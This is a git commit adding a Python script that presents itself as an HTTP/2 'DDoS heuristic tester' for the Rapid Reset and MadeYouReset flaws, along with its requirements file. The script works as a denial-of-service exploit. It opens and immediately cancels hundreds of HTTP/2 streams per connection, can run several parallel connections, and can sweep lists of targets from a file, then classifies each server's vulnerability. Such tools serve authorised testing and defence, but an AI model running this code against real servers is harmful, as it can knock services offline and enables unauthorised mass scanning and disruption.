This commit is contained in:
Francisco Santibañez
2025-08-18 13:17:41 -06:00
parent 93af85c9de
commit 91e3c3875e
3 changed files with 446 additions and 0 deletions

1
.gitignore vendored
View File

@@ -25,6 +25,7 @@ share/python-wheels/
.installed.cfg
*.egg
MANIFEST
.DS_Store
# PyInstaller
# Usually these files are written by a python script from a template

440
CVE-2025-25063.py Normal file
View File

@@ -0,0 +1,440 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import ssl
import socket
import time
from urllib.parse import urlparse
from datetime import datetime
import json
import csv
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import (
SettingsAcknowledged, ConnectionTerminated,
PingAckReceived, WindowUpdated, RemoteSettingsChanged
)
from colorama import Fore, Style, init
init(autoreset=True)
def print_banner():
banner = f"""
{Fore.CYAN}{Style.BRIGHT}
╔╦╗┌─┐┌┬┐┌─┐╦ ╦┌─┐┬ ┬╦═╗┌─┐┌─┐┌─┐┌┬┐
║║║├─┤ ││├┤ ╚╦╝│ ││ │╠╦╝├┤ └─┐├┤ │
╩ ╩┴ ┴─┴┘└─┘ ╩ └─┘└─┘╩╚═└─┘└─┘└─┘ ┴
{Style.RESET_ALL}
"""
print(banner)
print(f"{Fore.YELLOW}[ HTTP/2 DDoS Heuristic Tester | CVE-2023-44487 & CVE-2025-25063 ]{Style.RESET_ALL}\n")
print(f"{Fore.WHITE}[ m10sec@proton.me | m10sec 2025 ]{Style.RESET_ALL}\n")
def check_http2_support(host, port=443, tls=True, timeout=5.0):
"""Devuelve True si el host negocia HTTP/2 vía ALPN."""
try:
raw = socket.create_connection((host, port), timeout=timeout)
if tls:
ctx = ssl.create_default_context()
ctx.set_alpn_protocols(["h2", "http/1.1"]) # aceptar h2 si está disponible
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
s = ctx.wrap_socket(raw, server_hostname=host)
proto = s.selected_alpn_protocol()
s.close()
return proto == "h2"
else:
raw.close()
return False
except Exception:
return False
class H2Client:
def __init__(self, host, port, tls=True, server_name=None, timeout=6.0):
self.host = host
self.port = port
self.tls = tls
self.server_name = server_name or host
self.timeout = timeout
self.sock = None
self.conn = None
self.metrics = {
"goaway": 0,
"goaway_codes": [],
"rst_sent": 0,
"rst_rate_per_s": 0.0,
"streams_opened": 0,
"pings": 0,
"ping_rtt_ms": [],
"remote_max_concurrent_streams": None,
"throttled": False,
"errors": []
}
def _wrap_tls(self, raw):
ctx = ssl.create_default_context()
ctx.set_alpn_protocols(["h2"]) # Forzar ALPN h2
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE # Cambia a CERT_REQUIRED si deseas validar
return ctx.wrap_socket(raw, server_hostname=self.server_name)
def connect(self):
raw = socket.create_connection((self.host, self.port), timeout=self.timeout)
self.sock = self._wrap_tls(raw) if self.tls else raw
self.sock.settimeout(self.timeout)
cfg = H2Configuration(client_side=True, header_encoding="utf-8")
self.conn = H2Connection(config=cfg)
self.conn.initiate_connection()
self._send(self.conn.data_to_send())
self._drain()
def close(self):
try:
self.sock.close()
except Exception:
pass
def _send(self, data: bytes):
if not data:
return
self.sock.sendall(data)
def _drain(self, dur=0.01):
end = time.time() + dur
while time.time() < end:
try:
data = self.sock.recv(65535)
if not data:
break
events = self.conn.receive_data(data)
for ev in events:
if isinstance(ev, ConnectionTerminated):
self.metrics["goaway"] += 1
self.metrics["goaway_codes"].append(ev.error_code)
if ev.error_code in (0xb, 0x1): # ENHANCE_YOUR_CALM / PROTOCOL_ERROR
self.metrics["throttled"] = True
elif isinstance(ev, RemoteSettingsChanged):
mcs = ev.changed_settings.get(0x3) # SETTINGS_MAX_CONCURRENT_STREAMS
if mcs:
self.metrics["remote_max_concurrent_streams"] = mcs.new_value
elif isinstance(ev, PingAckReceived):
try:
sent_ns = int.from_bytes(ev.ping_data, "big")
rtt_ms = (time.time_ns() - sent_ns) / 1e6
self.metrics["ping_rtt_ms"].append(rtt_ms)
except Exception:
self.metrics["ping_rtt_ms"].append(-1)
self._send(self.conn.data_to_send())
except socket.timeout:
break
except Exception as e:
self.metrics["errors"].append(str(e))
break
def ping(self):
from hyperframe.frame import PingFrame
pf = PingFrame(0)
pf.opaque_data = int(time.time_ns()).to_bytes(8, "big")
self._send(pf.serialize())
self.metrics["pings"] += 1
self._drain(0.2)
def rapid_reset(self, authority, path="/", n_streams=100, header_extra=None, pace_s=0.0):
"""CVE-2023-44487 baseline: abre streams y los resetea inmediatamente."""
headers_base = [
(":method", "GET"),
(":authority", authority),
(":scheme", "https" if self.tls else "http"),
(":path", path),
("user-agent", "h2-check/rr")
]
if header_extra:
headers_base.extend(header_extra)
start = time.time()
for _ in range(n_streams):
sid = self.conn.get_next_available_stream_id()
self.conn.send_headers(sid, headers_base, end_stream=True)
# Cierra vía state machine de hyper-h2
self.conn.reset_stream(sid, error_code=0x8) # CANCEL
self._send(self.conn.data_to_send())
self.metrics["rst_sent"] += 1
self.metrics["streams_opened"] += 1
self._drain(0.0)
if pace_s:
time.sleep(pace_s)
dur = max(0.001, time.time() - start)
self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur
self._drain(0.5)
def made_you_reset_variation(self, authority, path="/", n_streams=100, jitter_ms=2):
"""CVE-2025-25063 heurística: HEADERS end_stream=False + pequeño jitter y RST."""
import random
headers_base = [
(":method", "GET"),
(":authority", authority),
(":scheme", "https" if self.tls else "http"),
(":path", path),
("user-agent", "h2-check/myr")
]
start = time.time()
for i in range(n_streams):
sid = self.conn.get_next_available_stream_id()
self.conn.send_headers(sid, headers_base, end_stream=False)
self._send(self.conn.data_to_send())
time.sleep(random.uniform(0, jitter_ms/1000.0))
self.conn.reset_stream(sid, error_code=0x8)
self._send(self.conn.data_to_send())
self.metrics["rst_sent"] += 1
self.metrics["streams_opened"] += 1
if i % 20 == 0:
self.ping()
self._drain(0.0)
dur = max(0.001, time.time() - start)
self.metrics["rst_rate_per_s"] = self.metrics["rst_sent"] / dur
self._drain(0.8)
def classify(metrics):
go_enhance = any(code == 0xb for code in metrics["goaway_codes"]) # ENHANCE_YOUR_CALM
high_rate = metrics["rst_rate_per_s"] > 500
no_limits = (metrics["remote_max_concurrent_streams"] in (None, 0) or
(metrics["remote_max_concurrent_streams"] and metrics["remote_max_concurrent_streams"] > 1000))
rtt_spikes = any(rtt > 200 for rtt in metrics["ping_rtt_ms"] if rtt >= 0)
if not metrics["goaway"] and no_limits and high_rate and rtt_spikes:
verdict = "LIKELY_VULN"
elif not go_enhance and (high_rate or no_limits):
verdict = "POSSIBLE"
else:
verdict = "UNLIKELY"
return verdict
def scan_for_vulnerability(target_url, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0):
"""Devuelve un dict estilo resumen con soporte HTTP/2 y veredicto heurístico."""
u = urlparse(target_url)
tls = (u.scheme == "https")
port = u.port or (443 if tls else 80)
authority = u.netloc.split(":")[0]
http2_supported = check_http2_support(authority, port=port, tls=tls, timeout=timeout)
result = {
"Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"URL": target_url if u.scheme else f"https://{authority}",
"HTTP/2 Support": "Yes" if http2_supported else "No",
"Vulnerable": "UNKNOWN",
"Details": "No se pudo completar el análisis"
}
if not http2_supported:
result["Details"] = "El servidor no negoció HTTP/2 (ALPN)."
return result
c = H2Client(authority, port, tls=tls, server_name=authority, timeout=timeout)
try:
c.connect()
if mode in ("rapid", "both"):
c.rapid_reset(authority, path=u.path or "/", n_streams=streams, pace_s=pace)
if mode in ("myr", "both"):
c.made_you_reset_variation(authority, path=u.path or "/", n_streams=streams, jitter_ms=jitter)
verdict = classify(c.metrics)
mapping = {"LIKELY_VULN": "LIKELY", "POSSIBLE": "POSSIBLE", "UNLIKELY": "UNLIKELY"}
result["Vulnerable"] = mapping.get(verdict, verdict)
result["Details"] = (
f"streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']}"
)
except Exception as e:
result["Vulnerable"] = "UNKNOWN"
result["Details"] = f"Error durante prueba: {e}"
finally:
c.close()
return result
def _normalize_target(s: str) -> str:
s = (s or "").strip()
if not s:
return s
if not s.startswith("http"):
s = "https://" + s
return s
def interactive_menu():
print("\n=== HTTP/2 DDoS Heuristic Tester ===")
print("1) CVE-2023-44487 (Rapid Reset)")
print("2) CVE-2025-25063 (MadeYouReset)")
print("3) Ambos (comparativa)")
print("4) Salir")
choice = input("Selecciona opción [1-4]: ").strip() or "2"
if choice not in {"1","2","3"}:
print("Saliendo.")
return
target = _normalize_target(input("Target (https://dominio o http://ip): ").strip())
if not target:
print("No se ingresó target. Saliendo.")
return
try:
streams = int((input("Streams por conexión [200]: ") or "200").strip())
except Exception:
streams = 200
try:
jitter = int((input("Jitter ms (solo MYR) [2]: ") or "2").strip())
except Exception:
jitter = 2
mode = "rapid" if choice == "1" else ("myr" if choice == "2" else "both")
summary = scan_for_vulnerability(target, mode=mode, streams=streams, jitter=jitter)
print(json.dumps(summary, ensure_ascii=False, indent=2))
def bulk_scan_from_txt(path, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0,
out_json=None, out_csv=None, line_by_line=True):
"""Lee un archivo TXT con un target por línea y escanea cada uno.
- Imprime 1 línea por resultado (NDJSON) para no saturar la salida.
- Si se especifica out_json, guarda un array JSON con todos los resultados.
- Si se especifica out_csv, guarda CSV con columnas fijas.
"""
results = []
try:
with open(path, "r", encoding="utf-8") as f:
lines = [ln.strip() for ln in f if ln.strip() and not ln.strip().startswith("#")]
except Exception as e:
print(f"[!] No pude leer '{path}': {e}")
return
for target in lines:
target_url = _normalize_target(target)
try:
res = scan_for_vulnerability(target_url, mode=mode, streams=streams,
timeout=timeout, jitter=jitter, pace=pace)
except Exception as e:
res = {
"Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"URL": target_url,
"HTTP/2 Support": "UNKNOWN",
"Vulnerable": "UNKNOWN",
"Details": f"Error general: {e}"
}
results.append(res)
if line_by_line:
print(json.dumps(res, ensure_ascii=False))
if out_json:
try:
with open(out_json, "w", encoding="utf-8") as jf:
json.dump(results, jf, ensure_ascii=False, indent=2)
print(f"[+] Guardado JSON en {out_json}")
except Exception as e:
print(f"[!] No pude guardar JSON en {out_json}: {e}")
if out_csv:
try:
with open(out_csv, "w", encoding="utf-8", newline="") as cf:
writer = csv.DictWriter(cf, fieldnames=["Timestamp","URL","HTTP/2 Support","Vulnerable","Details"])
writer.writeheader()
for r in results:
writer.writerow(r)
print(f"[+] Guardado CSV en {out_csv}")
except Exception as e:
print(f"[!] No pude guardar CSV en {out_csv}: {e}")
# -----------------------------
# Punto de entrada
# -----------------------------
def main():
print_banner()
ap = argparse.ArgumentParser(description="HTTP/2 MadeYouReset heuristic checker")
ap.add_argument("target", nargs="?", help="URL objetivo, p.ej. https://example.com (opcional si usas --menu o --targets-file)")
ap.add_argument("--path", default="/", help="Ruta a solicitar")
ap.add_argument("--mode", choices=["rapid", "myr", "both"], default="myr",
help="Prueba: rapid (CVE-2023-44487), myr (CVE-2025-25063), both")
ap.add_argument("--conns", type=int, default=1, help="Conexiones paralelas")
ap.add_argument("--streams", type=int, default=200, help="Streams por conexión")
ap.add_argument("--timeout", type=float, default=6.0, help="Timeout socket")
ap.add_argument("--pace", type=float, default=0.0, help="Pausa entre streams (rapid)")
ap.add_argument("--jitter", type=int, default=2, help="Jitter ms (myr)")
ap.add_argument("--json", action="store_true", help="Salida JSON resumida (scan_for_vulnerability)")
ap.add_argument("--menu", action="store_true", help="Abrir menú interactivo")
ap.add_argument("--targets-file", help="Ruta a TXT con un target por línea (modo bulk)")
ap.add_argument("--out-json", help="Guardar resultados bulk en archivo JSON")
ap.add_argument("--out-csv", help="Guardar resultados bulk en archivo CSV")
args = ap.parse_args()
# Agrego Bulk
if args.targets_file:
bulk_scan_from_txt(
args.targets_file,
mode=args.mode,
streams=args.streams,
timeout=args.timeout,
jitter=args.jitter,
pace=args.pace,
out_json=args.out_json,
out_csv=args.out_csv,
line_by_line=True,
)
return
# se activa el menu
if args.menu or not args.target:
interactive_menu()
return
u = urlparse(args.target)
tls = (u.scheme == "https")
port = u.port or (443 if tls else 80)
authority = u.netloc.split(":")[0]
if args.json:
summary = scan_for_vulnerability(
args.target,
mode=args.mode,
streams=args.streams,
timeout=args.timeout,
jitter=args.jitter,
pace=args.pace
)
print(json.dumps(summary, ensure_ascii=False, indent=2))
return
clients = []
for _ in range(args.conns):
c = H2Client(authority, port, tls=tls, server_name=authority, timeout=args.timeout)
c.connect()
clients.append(c)
try:
for c in clients:
if args.mode in ("rapid", "both"):
c.rapid_reset(authority, path=args.path, n_streams=args.streams, pace_s=args.pace)
if args.mode in ("myr", "both"):
c.made_you_reset_variation(authority, path=args.path, n_streams=args.streams, jitter_ms=args.jitter)
print("\n=== Resultados ===")
for i, c in enumerate(clients, 1):
v = classify(c.metrics)
print(f"[Conn {i}] verdict={v} streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} "
f"rtt_ms={','.join(f'{x:.0f}' if x>=0 else '-' for x in c.metrics['ping_rtt_ms'])}")
finally:
for c in clients:
c.close()
if __name__ == "__main__":
main()

5
requirements.txt Normal file
View File

@@ -0,0 +1,5 @@
# requirements.txt
h2>=4.1.0
hyperframe>=6.0.1
hpack>=4.0.0
colorama>=0.4.6